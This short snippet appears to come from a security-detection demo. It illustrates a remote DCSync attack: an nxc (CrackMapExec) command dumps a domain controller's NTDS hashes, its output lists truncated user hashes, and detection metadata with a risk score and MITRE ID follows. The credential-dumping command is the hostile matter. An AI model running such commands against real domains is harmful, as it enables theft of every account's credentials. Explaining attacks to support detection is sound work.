Attack #1: CrackMapExec (Remote DC Sync)
The scariest attack — uses SMB for remote replication. Completely bypasses endpoint-level EDR.
$ nxc smb 10.190.32.10 -u 'kevin.mitnick' --ntds
[*] Windows Server 2019 Build 17763 (domain:hackproof.local)
[+] hackproof.local\kevin.mitnick (Pwn3d!)
[*] Dumping the NTDS, this could take a while...
Administrator:500:aad3b435b51404eeaad3...
hackproof.local\juan:e19ccf75ee54e06b06a5...
hackproof.local\chen:b4b9b02e6f09a9bd760f...
[*] All domain hashes dumped successfully
Risk Score: 47
User: kevin.mitnick
Host: dc02
MITRE: T1003.006